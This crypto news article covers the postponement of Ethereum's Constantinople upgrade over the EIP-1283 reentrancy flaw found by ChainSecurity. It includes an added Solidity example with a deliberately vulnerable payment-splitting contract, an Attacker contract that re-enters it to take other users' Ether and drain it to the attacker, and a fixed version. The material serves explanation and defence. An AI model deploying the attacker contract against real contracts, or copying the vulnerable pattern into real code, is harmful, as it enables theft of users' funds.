Ethereum’s upcoming Constantinople upgrade has been postponed after a serious vulnerability was found in one of the proposed changes. The delay follows a potential security issue identified by the security audit firm ChainSecurity, according to the Ethereum blog.
Ethereum Improvement Proposal (EIP) 1283, if activated, could give attackers a loophole to steal users’ funds from affected smart contracts. Ethereum developers therefore agreed to postpone the hard fork.
As reported earlier, Constantinople was also set to cut the issuance of new $ETH to miners from 3 ETH per block to 2 ETH per block, a reduction of one third. That change was scheduled for block 7,080,000 as part of the hard fork.
Constantinople is the name of Ethereum’s next hard fork system upgrade. It is one step on the multi-stage path towards Serenity, the release that introduces Proof of Stake. On December 6th, 2018, the Ethereum core developers decided to proceed with Constantinople at block 7,080,000; with an average block time of roughly 14.5 seconds, that block number is what translates into an expected calendar date.
What is the vulnerability?
ChainSecurity found that the Constantinople upgrade makes certain SSTORE operations cheaper. As an unintended side effect, this enables reentrancy attacks through address.transfer(…) and address.send(…) in Solidity smart contracts. These two functions forward only a 2,300-gas stipend to the callee, which before the change was too little to write to storage, so they were widely treated as reentrancy-safe. After the change they no longer are.
ChainSecurity illustrated the issue with a sample contract, PaymentSharer, that behaves like a treasury-sharing service: two parties jointly receive funds, agree on how to split them, and are paid out accordingly. The attack lets an attacker drain other users’ Ether from such a contract and repeat the process.
ChainSecurity’s blog post describes the setup as follows (the attacker contract it refers to as “listed below” appears in that post, not here):
“Two parties can jointly receive funds, decide on how to split them, and receive a payout if they agree. An attacker will create such a pair where the first address is the attacker contract listed below and the second address is any attacker account. For this pair, the attacker will deposit some money.”
What are reentrancy attacks?
One of the major risks of calling an external contract is that the callee takes over the control flow and can trigger changes to state that the calling function did not anticipate. Bugs of this kind take many forms. In general, a reentrancy condition exists when an attacker can call a contract’s function and then re-enter the contract, one or more times, before the original call has finished, typically before it has updated its own state. This is especially dangerous in functions that move Ether.
A new fork date will be chosen at another Ethereum developer meeting on Friday. Those who took the decision to delay the fork included Ethereum co-founder Vitalik Buterin, developers Hudson Jameson, Nick Johnson and Evan Van Ness, and Parity release manager Afri Schoedon.
This is not the first time the upgrade has been postponed: it was originally scheduled to go live in November 2018, but those plans were derailed by network bugs. Constantinople is also part of Ethereum’s move towards a proof-of-stake consensus algorithm, planned for later in 2019, away from the more energy-intensive proof-of-work it uses today. The upgrade is meant to speed up processing, change how the network charges for data storage, and reduce the block reward from three to two ETH.
ChainSecurity added that a scan of the main Ethereum blockchain, using data available from eveem.org, did not turn up any vulnerable smart contracts. The firm is working with members of ethsecurity.org to extend the scan to contracts whose bytecode has not yet been decompiled.
ChainSecurity’s post also spelled out the gas arithmetic. Before Constantinople, any write to storage (SSTORE) cost at least 5,000 gas, more than the 2,300-gas stipend forwarded when a contract is called via “transfer” or “send”, so a reentrant callee could not modify the caller’s storage. After the upgrade, a write to a storage slot that has already been modified in the same transaction (a “dirty” slot) costs only 200 gas, so, in the post’s words, “the attacker contract can use the 2300 gas stipend to manipulate the vulnerable contract’s variable successfully.”
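The pattern described in the reentrancy section and in the gas discussion above, as an added Solidity example: a split percentage that is re-read after an external call, and an attacker whose fallback rewrites it with a reentrant call that only fits inside the 2,300-gas stipend once a dirty-slot SSTORE costs 200 gas. This is illustration code written for this page, not ChainSecurity’s published PaymentSharer or attacker contract; the contract and function names, the absence of access control on updateSplit, and the fixed variant are assumptions of this example. The gas figures in the comments are the pre- and post-EIP-1283 SSTORE costs quoted in the text; that the reentrant call fits within the stipend is ChainSecurity’s finding, not something measured here.

```solidity
pragma solidity ^0.5.0;

// Added example, modelled on the treasury-sharing pattern described above.
// Pair `id` has two payees; `splits[id]` is the percentage owed to `first`.
contract PaymentSharerVulnerable {
    mapping(uint => uint) public splits;
    mapping(uint => uint) public deposits;
    mapping(uint => address payable) public first;
    mapping(uint => address payable) public second;

    function init(uint id, address payable a, address payable b) external {
        require(first[id] == address(0) && second[id] == address(0), "pair taken");
        first[id] = a;
        second[id] = b;
    }

    function deposit(uint id) external payable {
        deposits[id] += msg.value;
    }

    // Assumption of this example: no access control, as in a contract that
    // expects agreement to be checked elsewhere. One plain SSTORE to splits[id].
    function updateSplit(uint id, uint split) external {
        require(split <= 100, "bad split");
        splits[id] = split;
    }

    function splitFunds(uint id) external {
        address payable a = first[id];
        address payable b = second[id];
        uint depo = deposits[id];
        deposits[id] = 0;                        // effect before interaction: fine
        a.transfer(depo * splits[id] / 100);     // external call, 2,300 gas stipend
        // BUG: splits[id] is read again after an external call. If a's fallback
        // re-entered and changed it, b is paid with Ether belonging to other pairs.
        b.transfer(depo * (100 - splits[id]) / 100);
    }
}

// Added example attacker. Setup assumed: pair 0 initialised with
// first = this contract, second = any attacker-controlled account, plus deposits.
contract Attacker {
    PaymentSharerVulnerable private victim;
    address payable private owner;

    constructor(PaymentSharerVulnerable v) public {
        victim = v;
        owner = msg.sender;
    }

    function attack() external {
        victim.updateSplit(0, 100);   // first SSTORE this tx: splits[0] is now "dirty"
        victim.splitFunds(0);         // 100% to this contract, then the fallback runs
    }

    // Reached through a.transfer(...) with only 2,300 gas. Before Constantinople
    // the SSTORE inside updateSplit cost at least 5,000 gas, so this call ran out
    // of gas and failed harmlessly. Under EIP-1283 the dirty-slot write costs
    // 200 gas, so it succeeds and `second` is then paid 100% of the deposit too.
    // A low-level call is used so no gas is spent on Solidity's extcodesize check.
    function () external payable {
        bytes memory data = abi.encodeWithSignature(
            "updateSplit(uint256,uint256)", uint256(0), uint256(0));
        (bool ok, ) = address(victim).call(data);
        ok; // result deliberately ignored; a failed write just means no gain
    }

    function drain() external {
        owner.transfer(address(this).balance);
    }
}

// Hardened variant: snapshot every value before the first external call and
// add a mutex, instead of relying on the 2,300-gas stipend as protection.
contract PaymentSharerFixed is PaymentSharerVulnerable {
    bool private locked;

    function splitFunds(uint id) external {
        require(!locked, "reentrant call");
        locked = true;
        address payable a = first[id];
        address payable b = second[id];
        uint depo = deposits[id];
        uint split = splits[id];      // read once, before any external call
        deposits[id] = 0;
        uint toA = depo * split / 100;
        uint toB = depo - toA;        // both payouts derived from one snapshot
        a.transfer(toA);
        b.transfer(toB);
        locked = false;
    }
}
```

The lesson that survives EIP-1283 regardless of gas pricing: treat transfer and send as ordinary external calls, finish every state read and write before making them (checks-effects-interactions), and use an explicit reentrancy guard where the function moves Ether. The guard alone would not have been enough in the vulnerable contract, because updateSplit, not splitFunds, is the function the attacker re-enters; the snapshot of splits[id] is what removes the gain.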
Disclaimer: This information should not be interpreted as an endorsement of any cryptocurrency. It is not a recommendation to trade. The crypto market is full of surprises and overhyped assets. Do your research before buying anything. Do not invest more than you can afford to lose.